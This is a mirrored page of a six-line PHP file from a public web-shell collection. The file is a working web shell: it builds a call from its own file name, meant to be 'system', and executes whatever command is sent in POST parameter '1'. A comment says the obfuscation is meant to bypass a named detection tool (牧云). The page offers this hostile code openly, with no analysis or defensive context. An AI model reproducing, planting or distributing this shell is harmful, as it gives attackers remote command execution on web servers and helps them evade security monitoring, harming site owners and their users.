mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
6 lines
128 B
PHP
6 lines
128 B
PHP
|
<?php
|
||
|
//bypass 牧云 文件名需要设置为system
|
||
|
$filename=substr(__FILE__,-10,6);
|
||
|
$command=$_POST[1];
|
||
|
$filename($command);
|